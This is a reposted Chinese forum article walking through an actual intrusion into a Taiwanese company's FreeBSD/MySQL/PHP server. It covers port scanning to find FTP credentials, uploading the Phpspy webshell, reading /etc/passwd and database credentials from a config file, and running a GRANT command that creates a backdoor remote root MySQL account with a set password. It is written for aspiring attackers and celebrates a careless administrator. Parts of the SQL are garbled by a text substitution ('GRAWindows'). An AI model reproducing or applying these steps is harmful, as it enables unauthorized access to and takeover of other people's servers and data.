[转帖]入侵FreeBSD的桥梁 _MySQL, Oracle及数据库讨论区_Weblogic技术|Tuxedo技术|中间件技术|Oracle论坛|JAVA论坛|Linux/Unix技术|hadoop论坛_联动北方技术论坛  
网站首页 | 关于我们 | 服务中心 | 经验交流 | 公司荣誉 | 成功案例 | 合作伙伴 | 联系我们 |
联动北方-国内领先的云技术服务提供商
»  游客             当前位置:  论坛首页 »  自由讨论区 »  MySQL, Oracle及数据库讨论区 »
总帖数
1
每页帖数
101/1页1
返回列表
0
发起投票  发起投票 发新帖子
查看: 2610 | 回复: 0   主题: [转帖]入侵FreeBSD的桥梁         下一篇 
flying
注册用户
等级:下士
经验:153
发帖:75
精华:0
注册:2011-8-25
状态:离线
发送短消息息给flying 加好友    发送短消息息给flying 发消息
发表于: IP:您无权察看 2014-11-17 10:55:23 | [全部帖] [楼主帖] 楼主

    适合读者:FreeBSD爱好者、黑迷、网管  前置知识:FreeBSD基本命令,MYSQL基本操作
  脚本小子:目前针对Windows+MSSQL或Windows+MYSQL的系统,在入侵方面的文章可算不少,大多通过脚本漏洞上传WebShell,通过Serv-U提升权限,再通过PcAnyWhere或终端连接器远程连接。就系统而言,大陆用Windows的比较多,港台和国外很多服务器都是用的Unix、Linux或FreeBSD系统。本文就是针对的FreeBSD+MYSQL+PHP系统,结合一个具体实例,讲解了一下入侵思路。其实作者的运气不错,遇到了一个大意的管理员――有多少服务器管理员是这样大意的呢?
  MYSQL:入侵FreeBSD的桥梁
  面对一个PHP网站的时候,我的个人习惯是先看看有没有PHP注入漏洞,然后再看是否存在整站漏洞,如Discuz!漏洞,PHPbb执行命令漏洞等等。如果存在的话,可以利用它们上传Webshell,如不存在的话在看看有没有其它的系统漏洞。这次遇上的是台湾某网络工司的服务器,页面很简洁,注入漏洞、脚本漏洞都不存在,无奈之下拿出红客联盟的HScan v1.20,大概扫描一下看看。扫描结果图1所示。
       
  运气真不错,扫出一个FTP用户名和密码来,服务器还开了22(SSH),3306(MYSQL)两个重要端口。FTP登录,然后找一个可以上传的WEB目录上传Phpspy.php,如图2所示。
         
  在浏览器里输入http://211.***.***.91/e***u/lib/phpspy.php,进入Phpspy.php的 “WebShell模式”键入命令:id //查看当前用户:

 uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)


  键入命令:uname a //查看系统:

 FreeBSD www.e******u.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 25 11:10:00 CST 2001 Root@www.e******u.com:/home/usr/src/sys/compile/GENERIC i386


  键入命令:cat /etc/passwd //读取密码档

 # $FreeBSD: src/etc/master.passwd,v 1.25 1999/09/13 17:09:07 peter Exp $
#
Root:*:0:0:Charlie &:/Root:/bin/csh
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/home/db/mysql:/sbin/nologin
www:*:2000:2000:WWW Administrator:/home/www/main:/bin/tcsh
chat:*:2001:2000:Chat Administrator:/home/www/chat:/bin/tcsh
game:*:2002:2000:Game Administrator:/home/www/game:/bin/tcsh
elife:*:2003:2000:eLife Administrator:/home/www/elife:/bin/tcsh
game-tnid:*:1005:0:game-tnid:/home/game-tnid:/bin/tcsh
cyc:*:1010:0:cyc:/home/cyc:/bin/tcsh
webadm:*:1012:1012:webadm:/home/webadm:/bin/tcsh
funker:*:1014:1014:funker:/home/funker:/bin/tcsh


  小提示:FreeBSD的密码加密后存放在/etc/master.passwd文件下,而不像Unix 一样存放在/etc/shadow文件下,而且此文件只有Root用户可以读。
  通过文件Globalvar.inc读取数据库信息如下:

 $ethink4u_db = "web123"; // database info
$ethink4u_db_user = "Root";
$ethink4u_db_passwd = "";
$ethink4u_db_host = "localhost";


  进入Phpspy.php的“SQL的查询”页面,连接数据库,连接的数据名不是上面的“web123”而是“mysql”,连接成功后,输入如下命令:

 GRAWindows ALL PRIVILEGES ON *.* TO system@'%'IDEWindowsIFIED BY 'askyou' WITH GRAWindows OPTION


  一个远程的具有Root权限的用户“system”,密码为:“askyou”就建成了!这样就可以通过牛族MYSQL连接器远程连接,整个数据库的生杀大权就掌握在你的手中了!

--转自 北京联动北方科技有限公司




赞(0)    操作        顶端 
总帖数
1
每页帖数
101/1页1
返回列表
发新帖子
请输入验证码: 点击刷新验证码
您需要登录后才可以回帖 登录 | 注册
技术讨论